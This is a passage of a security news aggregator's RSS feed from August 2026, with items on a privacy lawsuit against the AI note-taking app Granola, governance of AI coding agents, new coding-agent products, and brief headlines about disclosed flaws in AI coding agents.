<description><![CDATA[You wouldn't let Claude Code cat your AWS credentials or Kubernetes config on request, would you?]]></description>
<link>https://tsecurity.de/de/3708914/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708914/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 20:02:28 +0200</pubDate>
<content:encoded><![CDATA[You wouldn't let Claude Code cat your AWS credentials or Kubernetes config on request, would you?]]></content:encoded>
</item>
<item>
<title><![CDATA[Granola lawsuit raises concerns over AI note-taking app privacy]]></title>
<description><![CDATA[AI note-taking app maker Granola is accused of violating privacy laws by developing software that can record conversations without all participants’ consent, according to a lawsuit filed July 30 in a California federal court.



It follows a similar ongoing case in the same district, filed last y...]]></description>
<link>https://tsecurity.de/de/3708885/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708885/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 19:46:37 +0200</pubDate>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">AI note-taking app maker Granola is accused of violating privacy laws by developing software that can record conversations without all participants’ consent, according to a lawsuit filed<strong> </strong>July 30 in a California federal court.</p>



<p class="wp-block-paragraph">It follows a similar ongoing case in the same district, filed last year, that involves another note-taking and transcription software vendor, Otter.ai.</p>



<p class="wp-block-paragraph">AI note-taking apps have proliferated in recent years, with dedicated tools emerging from vendors including Fellow, Fireflies, Otter, and others, some of which claim to have tens of millions of users. These AI assistants record and transcribe meeting conversations, generating automated summaries and follow-up items. Similar note-taking functionality is also built into virtual meeting platforms such as Google Meet, Microsoft Teams, and Zoom.</p>



<p class="wp-block-paragraph">However, the use of these AI note-taking tools has raised privacy concerns over the ability of some to record and transcribe conversations without the consent of all participants.</p>



<p class="wp-block-paragraph">The proposed class action <a href="https://storage.courtlistener.com/recap/gov.uscourts.cand.475308/gov.uscourts.cand.475308.1.0.pdf" target="_blank" rel="noreferrer noopener">complaint</a> against Granola, filed by Florida resident Tarra Chamberlain in the US District Court for the Northern District of California, alleges the company “purposefully” designed its app to record calls without requiring disclosure to all participants.  </p>



<p class="wp-block-paragraph">While some note-taking tools require a bot to join a video or voice call, Granola captures audio directly from the user’s computer, allowing it to transcribe meetings without appearing as a meeting participant.</p>



<p class="wp-block-paragraph">The complaint argues that this violates individual privacy rights as well as the California Invasion of Privacy Act (CIPA) that requires “all-party” consent when recording calls.</p>



<p class="wp-block-paragraph">The complaint also alleges that Granola then by default uses transcription data for commercial purposes, including its use in training its AI models, and “actively advertises the hidden nature of its technology as one of its primary advantages.”</p>



<p class="wp-block-paragraph">Granola did not respond to a request for comment.</p>



<p class="wp-block-paragraph">According to the company’s website, Granola offers two optional “<a href="https://docs.granola.ai/help-center/consent-security-privacy/transparency-solutions/introduction" target="_blank" rel="noreferrer noopener">transparency features</a>” that can be enabled by app users and admins: an automated chat message that alerts participants when transcription begins, and a watermark added to the user’s video feed. The company also <a href="https://docs.granola.ai/help-center/consent-security-privacy/model-training" target="_blank" rel="noreferrer noopener">promises</a> that data used to train its AI models is anonymized and “never sent to third parties.”</p>



<p class="wp-block-paragraph">The Granola case bears similarities to a <a href="https://www.computerworld.com/article/4041849/enterprise-note-taking-apps-face-legal-scrutiny-as-otter-hit-with-privacy-suit.html" target="_blank">separate lawsuit</a> involving Otter.ai. The class action filed last year alleges that Otter.ai records all users without their consent and uses their voices to train its speech recognition AI tools.</p>



<p class="wp-block-paragraph">Reporting on the latest developments in the Otter.ai suit, <em>MLex </em><a href="https://www.mlex.com/mlex/artificial-intelligence/articles/2509190/otter-ai-faces-skeptical-us-judge-in-bid-to-dismiss-privacy-litigation" target="_blank" rel="noreferrer noopener">wrote</a> this week that, during a court hearing Monday, the judge overseeing the case expressed skepticism about the company’s argument to dismiss the case. US District Judge Eumi K. Lee did not issue a ruling from the bench, saying a written judgement would follow.</p>



<p class="wp-block-paragraph">The two cases highlight some of the concerns businesses face when deploying AI note-taking tools.</p>



<p class="wp-block-paragraph">AI notetaking is “more dangerous than any other type of traditional recording apps and tools,” said <a href="https://www.forrester.com/analyst-bio/enza-iannopollo/BIO5004" target="_blank" rel="noreferrer noopener">Enza Iannopollo</a>, Forrester VP and principal analyst, as it raises additional questions about the use of employees’ conversation data.</p>



<p class="wp-block-paragraph">“Specifically, is the recorded data used for training models? Is the voice used for training other AI? How do I get ‘forgotten’ after my data and biometrics have been recorded? These concerns apply to AI specifically and must be added to the traditional privacy and confidentiality concerns organizations have for other type of recording apps and tools,” she said.</p>



<p class="wp-block-paragraph">Before deploying AI note-taking apps, Iannopollo recommends that businesses take appropriate steps to vet the tools and “ensure that all contractual clauses are aligned to the business AI risk appetite and risk management best practices.”</p>



<p class="wp-block-paragraph">“As these tools record, process, store, and share biometric data, organizations must ensure that they comply with all the relevant requirements,” Iannopollo said, adding that transparency and consent notices should be provided to all parties involved in the use of AI note-taking apps.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cloudflare open-sources vibe-coding platform for people who aren't coders]]></title>
<description><![CDATA[Cloudflare built an AI agent workspace for its employees. Now it’s open source.]]></description>
<link>https://tsecurity.de/de/3708883/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708883/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 19:46:36 +0200</pubDate>
<content:encoded><![CDATA[Cloudflare built an AI agent workspace for its employees. Now it’s open source.]]></content:encoded>
</item>
<item>
<title><![CDATA[Naïve raises $28.5M to automate the grunt work of setting up and running a company]]></title>
<description><![CDATA[Taking vibe-coding a step further, Naïve claims its infra can automate most of the work in setting up and running a business.]]></description>
<link>https://tsecurity.de/de/3708874/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708874/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 19:46:34 +0200</pubDate>
<content:encoded><![CDATA[Taking vibe-coding a step further, Naïve claims its infra can automate most of the work in setting up and running a business.]]></content:encoded>
</item>
<item>
<title><![CDATA[Adaptive Experimentation with Meta’s Ax: A Practical Coding Guide]]></title>
<description><![CDATA[In this tutorial, we explore adaptive experimentation using Meta’s Ax with the modern Client API. We work through a complete workflow where we tune a RandomForest model on a synthetic classification dataset while balancing predictive accuracy against model footprint. We begin by defining a mixed ...]]></description>
<link>https://tsecurity.de/de/3708867/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708867/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 19:43:45 +0200</pubDate>
<content:encoded><![CDATA[<p>In this tutorial, we explore adaptive experimentation using Meta’s Ax with the modern Client API. We work through a complete workflow where we tune a RandomForest model on a synthetic classification dataset while balancing predictive accuracy against model footprint. We begin by defining a mixed search space with integer, float, log-scaled, and categorical parameters, then […]</p>
<p>The post <a href="https://www.marktechpost.com/2026/08/06/adaptive-experimentation-with-metas-ax-a-practical-coding-guide/">Adaptive Experimentation with Meta’s Ax: A Practical Coding Guide</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agent Skills for Automated Reasoning policies in Amazon Bedrock]]></title>
<description><![CDATA[Learn how to run the full Amazon Bedrock Automated Reasoning policy lifecycle from your coding agent. A suite of open source Agent Skills builds, reviews, tests, debugs, deploys, and validates a custom policy end to end, turning a specialized console task into a repeatable engineering workflow.]]></description>
<link>https://tsecurity.de/de/3708862/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708862/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 19:40:47 +0200</pubDate>
<content:encoded><![CDATA[Learn how to run the full Amazon Bedrock Automated Reasoning policy lifecycle from your coding agent. A suite of open source Agent Skills builds, reviews, tests, debugs, deploys, and validates a custom policy end to end, turning a specialized console task into a repeatable engineering workflow.]]></content:encoded>
</item>
<item>
<title><![CDATA[Build visibility for Codex on Amazon Bedrock with OpenTelemetry and Amazon CloudWatch]]></title>
<description><![CDATA[As engineering teams adopt coding agents like Codex, leaders need visibility into adoption, consumption, and reliability. This post shows how to route Codex OpenTelemetry metrics through a local collector to Amazon CloudWatch for an AWS native view of usage by user, team, and cost center.]]></description>
<link>https://tsecurity.de/de/3708860/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708860/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 19:40:46 +0200</pubDate>
<content:encoded><![CDATA[As engineering teams adopt coding agents like Codex, leaders need visibility into adoption, consumption, and reliability. This post shows how to route Codex OpenTelemetry metrics through a local collector to Amazon CloudWatch for an AWS native view of usage by user, team, and cost center.]]></content:encoded>
</item>
<item>
<title><![CDATA[JOIN ME at TailscaleUp 2026!]]></title>
<description><![CDATA[YouTube Video]]></description>
<link>https://tsecurity.de/de/3708819/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708819/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 19:32:42 +0200</pubDate>
<content:encoded><![CDATA[<p>YouTube Video</p><p><iframe loading="lazy" src="https://www.youtube.com/embed/YLeZozeF6B0"></iframe></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vibe-Coding im Selbstversuch: Ich baue eine App zum Japanisch lernen]]></title>
<description><![CDATA[YouTube Video]]></description>
<link>https://tsecurity.de/de/3708816/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708816/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 19:32:31 +0200</pubDate>
<content:encoded><![CDATA[<p>YouTube Video</p><p><iframe loading="lazy" src="https://www.youtube.com/embed/JghqVWAgHKs"></iframe></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Flaws in Anthropic, Google, and OpenAI’s Coding Agents Enable RCE and Supply Chain Attacks]]></title>
<description><![CDATA[A repeatable vulnerability pattern across AI coding agents from Anthropic, Google, and OpenAI that allows attackers to achieve remote code execution, steal API credentials, and compromise software supply chains, all without any privileged access. The flaws were discovered by Novee security Resear...]]></description>
<link>https://tsecurity.de/de/3708717/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708717/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 19:08:21 +0200</pubDate>
<content:encoded><![CDATA[<p>A repeatable vulnerability pattern across AI coding agents from Anthropic, Google, and OpenAI that allows attackers to achieve remote code execution, steal API credentials, and compromise software supply chains, all without any privileged access. The flaws were discovered by Novee security Researcher Elad Meged testing each vendor’s default configuration on their own public repositories, meaning […]</p>
<p>The post <a href="https://cybersecuritynews.com/critical-flaws-in-ai-coding-agents/">Critical Flaws in Anthropic, Google, and OpenAI’s Coding Agents Enable RCE and Supply Chain Attacks</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Hat 2026: Critical Flaws Found in Anthropic, Google, and OpenAI Coding Agents]]></title>
<description><![CDATA[Researchers disclosed critical flaws in AI coding agents from Anthropic, Google, and OpenAI that could enable credential theft, RCE, and supply chain attacks.
The post Black Hat 2026: Critical Flaws Found in Anthropic, Google, and OpenAI Coding Agents appeared first on eSecurity Planet.]]></description>
<link>https://tsecurity.de/de/3708714/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708714/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 19:08:13 +0200</pubDate>
<content:encoded><![CDATA[<p>Researchers disclosed critical flaws in AI coding agents from Anthropic, Google, and OpenAI that could enable credential theft, RCE, and supply chain attacks.</p>
<p>The post <a href="https://www.esecurityplanet.com/threats/black-hat-2026-critical-flaws-found-in-anthropic-google-and-openai-coding-agents/">Black Hat 2026: Critical Flaws Found in Anthropic, Google, and OpenAI Coding Agents</a> appeared first on <a href="https://www.esecurityplanet.com/">eSecurity Planet</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Humans in the loop miss a third of dangerous AI coding agent requests]]></title>
<description><![CDATA[You wouldn't let Claude Code cat your AWS credentials or Kubernetes config on request, would you?]]></description>
<link>https://tsecurity.de/de/3708651/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708651/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 19:04:24 +0200</pubDate>
<content:encoded><![CDATA[You wouldn't let Claude Code cat your AWS credentials or Kubernetes config on request, would you?]]></content:encoded>
</item>
<item>
<title><![CDATA[Why governance is the accelerator for coding agents]]></title>
<description><![CDATA[Governance is what lets a team run coding agents and stand behind what they ship. As more code originates from agents, the question every engineering leader is now answering is not how fast the work moves, but who owns it and how it gets checked before it lands.



The teams pulling ahead decide ...]]></description>
<link>https://tsecurity.de/de/3708634/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708634/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 19:04:08 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Governance is what lets a team run coding agents and stand behind what they ship. As more code originates from agents, the question every engineering leader is now answering is not how fast the work moves, but who owns it and how it gets checked before it lands.</p>



<p class="wp-block-paragraph">The teams pulling ahead decide on the boundaries and the checks in advance. That’s what makes it safe to hit the accelerator: handing agents real work, with the right context in front of them, instead of the supervised busywork you get when no one trusts the output.</p>



<p class="wp-block-paragraph"><strong>Manual review doesn’t scale, it just moves the bottleneck</strong></p>



<p class="wp-block-paragraph">Reviewing everything by hand feels responsible, and at low volume it works. It falls apart the moment agents produce more than people can read. A team that inspects every change by hand just moves the constraint from writing code to approving it, and the queue that forms there is as long as the one it replaced.</p>



<p class="wp-block-paragraph">Worse, blanket caution treats every change as equally risky, so a copy tweak and a change to the authentication layer get the same scrutiny. Attention gets spread evenly across all kinds of work, which means the actually risky changes get less review time. Caution without structure doesn’t make you safer. It just slows you down.</p>



<p class="wp-block-paragraph"><strong>Governance should be infrastructure, not process</strong></p>



<p class="wp-block-paragraph">Governance done well is a set of decisions made once, in advance, so they don’t have to be relitigated on every change and so agents spend tokens on work that ships instead of reruns and reverts.</p>



<p class="wp-block-paragraph">1.       <strong>Scope: what each agent can touch, and what it can see.</strong> An agent working on documentation should not be able to modify how the system handles credentials. Defining those boundaries up front does double duty: it keeps most agent work inside areas where mistakes are cheap and recoverable, and it gives each agent the right context for its task instead of the whole codebase. Scope is where governance and good context come together, and it’s a big part of why governed agent programs produce better work.</p>



<p class="wp-block-paragraph">2.      <strong>Policy that runs itself.</strong> The parts of a CI/CD pipeline can run automatically on every change: tests pass, security scans clear, dependencies are approved, and anything touching a sensitive system routes to a required human owner. Encoded as policy, these run on both the first change and the ten-thousandth without fatigue, which is exactly the property you want when volume climbs.</p>



<p class="wp-block-paragraph">3.      <strong>Ownership that’s never ambiguous.</strong> Every change, whoever or whatever produced it, has a named person accountable for accepting it and standing behind it. Ownership is what keeps velocity from turning into a diffusion of responsibility, and it’s what lets you trace any decision back to a person when something goes wrong.</p>



<p class="wp-block-paragraph"><strong>What governed agent programs actually look like</strong></p>



<p class="wp-block-paragraph">Put those decisions in place and you can give agents more room without worrying about them running wild. When the boundaries are clear and the checks run on their own, letting an agent work in a well-scoped area stops being a leap of faith. The guardrails are what make the freedom usable, the same way brakes allow a car to go fast with confidence.</p>



<p class="wp-block-paragraph">Governance isn’t the tax you pay to use agents safely. It’s the infrastructure that turns agents from a risk you manage into leverage you can actually rely on.</p>



<p class="wp-block-paragraph"><strong>Where to start</strong></p>



<p class="wp-block-paragraph">You don’t need a new governance program before you can move. Run agents inside your existing system of work, where the permissions, ownership, and checks already live. Start with the scope and policy decisions that protect your riskiest areas, and widen the lane as trust builds.</p>



<p class="wp-block-paragraph">See how leading engineering organizations govern agent work without slowing it down at <a href="https://www.atlassian.com/software/jira/dev?utm_source=foundry&amp;utm_medium=paid-social&amp;utm_campaign=P:jira%7CO:ppm%7CV:foundry%7CG:us%7CL:en%7CF:aware%7CT:prospecting%7CI:imc-jira-ai-sdlc%7CA:display%7CD:alld&amp;utm_content=P:jira%7CO:ppm%7CV:foundry%7CG:us%7CL:en%7CF:aware%7CT:prospecting%7CI:imc-jira-ai-sdlc%7CA:display%7CD:alld%7CU:cio-6" target="_blank" rel="noreferrer noopener">jira.dev</a>.</p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Granola lawsuit raises concerns over AI note-taking app privacy]]></title>
<description><![CDATA[AI note-taking app maker Granola is accused of violating privacy laws by developing software that can record conversations without all participants’ consent, according to a lawsuit filed July 30 in a California federal court.



It follows a similar ongoing case in the same district, filed last y...]]></description>
<link>https://tsecurity.de/de/3708635/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708635/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 19:04:08 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">AI note-taking app maker Granola is accused of violating privacy laws by developing software that can record conversations without all participants’ consent, according to a lawsuit filed<strong> </strong>July 30 in a California federal court.</p>



<p class="wp-block-paragraph">It follows a similar ongoing case in the same district, filed last year, that involves another note-taking and transcription software vendor, Otter.ai.</p>



<p class="wp-block-paragraph">AI note-taking apps have proliferated in recent years, with dedicated tools emerging from vendors including Fellow, Fireflies, Otter, and others, some of which claim to have tens of millions of users. These AI assistants record and transcribe meeting conversations, generating automated summaries and follow-up items. Similar note-taking functionality is also built into virtual meeting platforms such as Google Meet, Microsoft Teams, and Zoom.</p>



<p class="wp-block-paragraph">However, the use of these AI note-taking tools has raised privacy concerns over the ability of some to record and transcribe conversations without the consent of all participants.</p>



<p class="wp-block-paragraph">The proposed class action <a href="https://storage.courtlistener.com/recap/gov.uscourts.cand.475308/gov.uscourts.cand.475308.1.0.pdf" target="_blank" rel="noreferrer noopener">complaint</a> against Granola, filed by Florida resident Tarra Chamberlain in the US District Court for the Northern District of California, alleges the company “purposefully” designed its app to record calls without requiring disclosure to all participants.  </p>



<p class="wp-block-paragraph">While some note-taking tools require a bot to join a video or voice call, Granola captures audio directly from the user’s computer, allowing it to transcribe meetings without appearing as a meeting participant.</p>



<p class="wp-block-paragraph">The complaint argues that this violates individual privacy rights as well as the California Invasion of Privacy Act (CIPA) that requires “all-party” consent when recording calls.</p>



<p class="wp-block-paragraph">The complaint also alleges that Granola then by default uses transcription data for commercial purposes, including its use in training its AI models, and “actively advertises the hidden nature of its technology as one of its primary advantages.”</p>



<p class="wp-block-paragraph">Granola did not respond to a request for comment.</p>



<p class="wp-block-paragraph">According to the company’s website, Granola offers two optional “<a href="https://docs.granola.ai/help-center/consent-security-privacy/transparency-solutions/introduction" target="_blank" rel="noreferrer noopener">transparency features</a>” that can be enabled by app users and admins: an automated chat message that alerts participants when transcription begins, and a watermark added to the user’s video feed. The company also <a href="https://docs.granola.ai/help-center/consent-security-privacy/model-training" target="_blank" rel="noreferrer noopener">promises</a> that data used to train its AI models is anonymized and “never sent to third parties.”</p>



<p class="wp-block-paragraph">The Granola case bears similarities to a <a href="https://www.computerworld.com/article/4041849/enterprise-note-taking-apps-face-legal-scrutiny-as-otter-hit-with-privacy-suit.html" target="_blank">separate lawsuit</a> involving Otter.ai. The class action filed last year alleges that Otter.ai records all users without their consent and uses their voices to train its speech recognition AI tools.</p>



<p class="wp-block-paragraph">Reporting on the latest developments in the Otter.ai suit, <em>MLex </em><a href="https://www.mlex.com/mlex/artificial-intelligence/articles/2509190/otter-ai-faces-skeptical-us-judge-in-bid-to-dismiss-privacy-litigation" target="_blank" rel="noreferrer noopener">wrote</a> this week that, during a court hearing Monday, the judge overseeing the case expressed skepticism about the company’s argument to dismiss the case. US District Judge Eumi K. Lee did not issue a ruling from the bench, saying a written judgement would follow.</p>



<p class="wp-block-paragraph">The two cases highlight some of the concerns businesses face when deploying AI note-taking tools.</p>



<p class="wp-block-paragraph">AI notetaking is “more dangerous than any other type of traditional recording apps and tools,” said <a href="https://www.forrester.com/analyst-bio/enza-iannopollo/BIO5004" target="_blank" rel="noreferrer noopener">Enza Iannopollo</a>, Forrester VP and principal analyst, as it raises additional questions about the use of employees’ conversation data.</p>



<p class="wp-block-paragraph">“Specifically, is the recorded data used for training models? Is the voice used for training other AI? How do I get ‘forgotten’ after my data and biometrics have been recorded? These concerns apply to AI specifically and must be added to the traditional privacy and confidentiality concerns organizations have for other type of recording apps and tools,” she said.</p>



<p class="wp-block-paragraph">Before deploying AI note-taking apps, Iannopollo recommends that businesses take appropriate steps to vet the tools and “ensure that all contractual clauses are aligned to the business AI risk appetite and risk management best practices.”</p>



<p class="wp-block-paragraph">“As these tools record, process, store, and share biometric data, organizations must ensure that they comply with all the relevant requirements,” Iannopollo said, adding that transparency and consent notices should be provided to all parties involved in the use of AI note-taking apps.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Naïve raises $28.5M to automate the grunt work of setting up and running a company]]></title>
<description><![CDATA[Taking vibe-coding a step further, Naive claims its infra can automate most of the work in setting up and running a business.]]></description>
<link>https://tsecurity.de/de/3708572/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708572/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 19:03:55 +0200</pubDate>
<content:encoded><![CDATA[Taking vibe-coding a step further, Naive claims its infra can automate most of the work in setting up and running a business.]]></content:encoded>
</item>
<item>
<title><![CDATA[Why governance is the accelerator for coding agents]]></title>
<description><![CDATA[Governance is what lets a team run coding agents and stand behind what they ship. As more code originates from agents, the question every engineering leader is now answering is not how fast the work moves, but who owns it and how it gets checked before it lands.



The teams pulling ahead decide ...]]></description>
<link>https://tsecurity.de/de/3708443/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708443/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 16:14:12 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Governance is what lets a team run coding agents and stand behind what they ship. As more code originates from agents, the question every engineering leader is now answering is not how fast the work moves, but who owns it and how it gets checked before it lands.</p>



<p class="wp-block-paragraph">The teams pulling ahead decide on the boundaries and the checks in advance. That’s what makes it safe to hit the accelerator: handing agents real work, with the right context in front of them, instead of the supervised busywork you get when no one trusts the output.</p>



<p class="wp-block-paragraph"><strong>Manual review doesn’t scale, it just moves the bottleneck</strong></p>



<p class="wp-block-paragraph">Reviewing everything by hand feels responsible, and at low volume it works. It falls apart the moment agents produce more than people can read. A team that inspects every change by hand just moves the constraint from writing code to approving it, and the queue that forms there is as long as the one it replaced.</p>



<p class="wp-block-paragraph">Worse, blanket caution treats every change as equally risky, so a copy tweak and a change to the authentication layer get the same scrutiny. Attention gets spread evenly across all kinds of work, which means the actually risky changes get less review time. Caution without structure doesn’t make you safer. It just slows you down.</p>



<p class="wp-block-paragraph"><strong>Governance should be infrastructure, not process</strong></p>



<p class="wp-block-paragraph">Governance done well is a set of decisions made once, in advance, so they don’t have to be relitigated on every change and so agents spend tokens on work that ships instead of reruns and reverts.</p>



<p class="wp-block-paragraph">1.       <strong>Scope: what each agent can touch, and what it can see.</strong> An agent working on documentation should not be able to modify how the system handles credentials. Defining those boundaries up front does double duty: it keeps most agent work inside areas where mistakes are cheap and recoverable, and it gives each agent the right context for its task instead of the whole codebase. Scope is where governance and good context come together, and it’s a big part of why governed agent programs produce better work.</p>



<p class="wp-block-paragraph">2.      <strong>Policy that runs itself.</strong> The parts of a CI/CD pipeline can run automatically on every change: tests pass, security scans clear, dependencies are approved, and anything touching a sensitive system routes to a required human owner. Encoded as policy, these run on both the first change and the ten-thousandth without fatigue, which is exactly the property you want when volume climbs.</p>



<p class="wp-block-paragraph">3.      <strong>Ownership that’s never ambiguous.</strong> Every change, whoever or whatever produced it, has a named person accountable for accepting it and standing behind it. Ownership is what keeps velocity from turning into a diffusion of responsibility, and it’s what lets you trace any decision back to a person when something goes wrong.</p>



<p class="wp-block-paragraph"><strong>What governed agent programs actually look like</strong></p>



<p class="wp-block-paragraph">Put those decisions in place and you can give agents more room without worrying about them running wild. When the boundaries are clear and the checks run on their own, letting an agent work in a well-scoped area stops being a leap of faith. The guardrails are what make the freedom usable, the same way brakes allow a car to go fast with confidence.</p>



<p class="wp-block-paragraph">Governance isn’t the tax you pay to use agents safely. It’s the infrastructure that turns agents from a risk you manage into leverage you can actually rely on.</p>



<p class="wp-block-paragraph"><strong>Where to start</strong></p>



<p class="wp-block-paragraph">You don’t need a new governance program before you can move. Run agents inside your existing system of work, where the permissions, ownership, and checks already live. Start with the scope and policy decisions that protect your riskiest areas, and widen the lane as trust builds.</p>



<p class="wp-block-paragraph">See how leading engineering organizations govern agent work without slowing it down at <a href="https://www.atlassian.com/software/jira/dev">jira</a><a href="https://www.atlassian.com/software/jira/dev?utm_source=foundry&amp;utm_medium=paid-social&amp;utm_campaign=P:jira%7CO:ppm%7CV:foundry%7CG:us%7CL:en%7CF:aware%7CT:prospecting%7CI:imc-jira-ai-sdlc%7CA:display%7CD:alld&amp;utm_content=P:jira%7CO:ppm%7CV:foundry%7CG:us%7CL:en%7CF:aware%7CT:prospecting%7CI:imc-jira-ai-sdlc%7CA:display%7CD:alld%7CU:cio-6" target="_blank" rel="noreferrer noopener">.</a><a href="https://www.atlassian.com/software/jira/dev">dev.</a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta schickt Muse Code als Coding-Agenten in die Beta]]></title>
<description><![CDATA[Meta hat eine frühe Beta von Muse Code angekündigt. Der Coding-Agent läuft im Terminal und soll Entwickler beim Planen, Schreiben und Prüfen von Software unterstützen, ähnlich...Zum Beitrag: Meta schickt Muse Code als Coding-Agenten in die Beta

Wo du uns folgen kannst:
Facebook, Reddit, Google N...]]></description>
<link>https://tsecurity.de/de/3708420/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708420/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 16:03:33 +0200</pubDate>
<content:encoded><![CDATA[<div><img width="720" height="405" src="https://stadt-bremerhaven.de/wp-content/uploads/2026/08/media-720x405.webp" class="attachment-medium size-medium wp-post-image" alt="Meta schickt Muse Code als Coding-Agenten in die Beta" decoding="async" loading="lazy" srcset="https://stadt-bremerhaven.de/wp-content/uploads/2026/08/media-720x405.webp 720w, https://stadt-bremerhaven.de/wp-content/uploads/2026/08/media-1280x720.webp 1280w, https://stadt-bremerhaven.de/wp-content/uploads/2026/08/media-768x432.webp 768w, https://stadt-bremerhaven.de/wp-content/uploads/2026/08/media-520x292.webp 520w, https://stadt-bremerhaven.de/wp-content/uploads/2026/08/media-830x467.webp 830w, https://stadt-bremerhaven.de/wp-content/uploads/2026/08/media.webp 1440w" sizes="auto, (max-width: 720px) 100vw, 720px"></div>Meta hat eine frühe Beta von Muse Code angekündigt. Der Coding-Agent läuft im Terminal und soll Entwickler beim Planen, Schreiben und Prüfen von Software unterstützen, ähnlich...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/meta-schickt-muse-code-als-coding-agenten-in-die-beta/">Meta schickt Muse Code als Coding-Agenten in die Beta</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Coding-Assistent Muse Code: Meta definiert Agenten in Muse Spark 1.2 neu]]></title>
<description><![CDATA[Mit Muse Code hat Meta die Beta-Version eines terminalbasierten Coding-Agenten auf Basis des neuen eigenen KI-Modells Muse Spark 1.2 veröffentlicht. Das System soll komplexe Softwareentwicklung über große Code-Repositories hinweg weitgehend selbstständig ausführen, Änderungen planen und die Ergeb...]]></description>
<link>https://tsecurity.de/de/3708262/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708262/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 15:21:48 +0200</pubDate>
<content:encoded><![CDATA[<img src="https://pics.computerbase.de/1/2/4/1/5/7-d875f7efb5b29a3a/article-640x360.36dbd45e.jpg"><p>Mit Muse Code hat Meta die Beta-Version eines terminalbasierten Coding-Agenten auf Basis des neuen eigenen KI-Modells Muse Spark 1.2 veröffentlicht. Das System soll komplexe Softwareentwicklung über große Code-Repositories hinweg weitgehend selbstständig ausführen, Änderungen planen und die Ergebnisse validieren.</p>]]></content:encoded>
</item>
<item>
